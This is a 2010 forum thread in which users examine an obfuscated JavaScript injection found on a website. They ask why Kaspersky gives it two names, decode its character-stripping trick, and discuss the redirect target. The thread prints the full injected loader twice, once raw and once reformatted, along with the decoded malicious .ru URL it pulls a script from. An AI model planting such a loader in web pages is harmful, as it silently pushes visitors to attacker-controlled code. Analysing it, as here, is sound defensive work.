Log in

View Full Version : KAV malware naming issue (funny)

cEnginEEr
February 5th, 2010, 07:59

while browsing a website I found kav got triggered; to see what was happening I downloaded the site and found that a single line of script was our culprit; 


<script>/*CODE1*/ try{window.onload = function(){var Q236s4ic4454clw = document.createElement('script');Q236s4ic4454clw.setAttribute('type', 'text/javascript');Q236s4ic4454clw.setAttribute('id', 'myscript1');Q236s4ic4454clw.setAttribute('src',  'h(t)!^t^))p#@:&&/(##/&$#c^$$l^@)(i&(c$^)k))#$s^o$#r!^)^-$$$&c@$o#^m$!#.#&(e((a!!s)(@t)&m((o@^^n!$!e&^&(y$#).#&c$@o$@!$^m(##(.@m@o@(b(^i&#l#!@e@)@&(-(d)&(e^&@(.))@&h)@@@o^^@m!e#&&amps)a#$$l$$#e^@!p^@l&@u#((^s^#@(.$)r$$u(:!$8!$0&$&8)@$0$!)/!o#&@c##@@n(@^!.))n@e@.)&j!@^#$p#/)^@o^c^n)((.()n^)e^$.@!)$j!!^(p#!/@&ampc^(l&(a&s(^s@!m^@a($^t#e!#^@)s$.^c^&#o((&m&/)(&@l&()i(@n)(k$@h&e)@$(l)$p^!e)$!$r$#.)&c!&n($@/$g#o^@&o!$$g$^l^&#@e$.&&!c#o@$$m(/$$'.replace(/\(|\!|&|#|\$|\)|@|\^/ig, ''));Q236s4ic4454clw.setAttribute('defer', 'defer');document.body.appendChild(Q236s4ic4454clw);}} catch(e) {}</script>



KAV (with the latest update) detects this as Trojan-Clicker.JS.Iframe.cz; just to see what was wrong with this script, I rearranged the code into more formatted style;


<script>/*CODE1*/ 

    try{

        window.onload = function(){

            var Q236s4ic4454clw = document.createElement('script');

            Q236s4ic4454clw.setAttribute('type', 'text/javascript');

            Q236s4ic4454clw.setAttribute('id', 'myscript1');

            Q236s4ic4454clw.setAttribute('src',  'h(t)!^t^))p#@:&&/(##/&$#c^$$l^@)(i&(c$^)k))#$s^o$#r!^)^-$$$&c@$o#^m$!#.#&(e((a!!s)(@t)&m((o@^^n!$!e&^&(y$#).#&c$@o$@!$^m(##(.@m@o@(b(^i&#l#!@e@)@&(-(d)&(e^&@(.))@&h)@@@o^^@m!e#&&amps)a#$$l$$#e^@!p^@l&@u#((^s^#@(.$)r$$u(:!$8!$0&$&8)@$0$!)/!o#&@c##@@n(@^!.))n@e@.)&j!@^#$p#/)^@o^c^n)((.()n^)e^$.@!)$j!!^(p#!/@&ampc^(l&(a&s(^s@!m^@a($^t#e!#^@)s$.^c^&#o((&m&/)(&@l&()i(@n)(k$@h&e)@$(l)$p^!e)$!$r$#.)&c!&n($@/$g#o^@&o!$$g$^l^&#@e$.&&!c#o@$$m(/$$'.replace(/\(|\!|&|#|\$|\)|@|\^/ig, ''));

            Q236s4ic4454clw.setAttribute('defer', 'defer');

            document.body.appendChild(Q236s4ic4454clw);

        }

    } catch(e) {}

</script>

to my surprise this time KAV detected it as Trojan.JS.Agent.axe; anyone can explain this?
bilbo
February 6th, 2010, 01:20

If you google for "Q236s4ic4454clw" (the variable name), you will find at least 12600 home-pages infected by the Javascript "virus" you submitted.

Some more info here:
http://www.symantec.com/connect/blogs/new-obfuscated-scripts-wild-lgpl
http://justcoded.com/article/gumblar-family-virus-removal-tool/

The "virus", per-se, simply redirect your browser to another location.

Deobfuscating it is very simple.
The key of everything is in

replace(/(|!|&|#|\$|\)|@|\^/ig, '')
which means: replace, with nothing, the eight characters ( ! & # $  @ ^ 

Removing them with your preferred editor from the previous string you will obtain the link:


'http://clicksor-com.eastmoney.com.mobile-de.homesaleplus.ru:8080/ocn.ne.jp/ocn.ne.jp/classmates.com/linkhelper.cn/google.com/'

Best regards, bilbo
evaluator
February 6th, 2010, 13:06
why that link won't to work? i'm cry..
Woodmann
February 6th, 2010, 21:55
Nice use of legit domain names to try and fool .
What is the real "payload" ?

Woodmann
bilbo
February 7th, 2010, 00:51

In my case, Firefox with "Block reported attack sites" ON, the site is blocked by the browser and asking further info brings to the interesting google link


http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://clicksor-com.eastmoney.com.mobile-de.homesaleplus.ru:8080/ocn.ne.jp/ocn.ne.jp/classmates.com/linkhelper.cn/google.com/



If you bypass the warning, further stuff from www.stopbadware.org appears, retrieved from the link 
http://en-us.malware-error.mozilla.com/?hl=en-US&url=http%3A%2F%2Fclicksor-com.eastmoney.com.mobile-de.homesaleplus.ru%3A8080%2Focn.ne.jp%2Focn.ne.jp%2Fclassmates.com%2Flinkhelper.cn%2Fgoogle.com%2F

but the real site effectively brings to a 404 error, so it seems gone...



Best regards, bilbo
evaluator
February 7th, 2010, 05:59
last is real addres, which not works
homesaleplus.ru:8080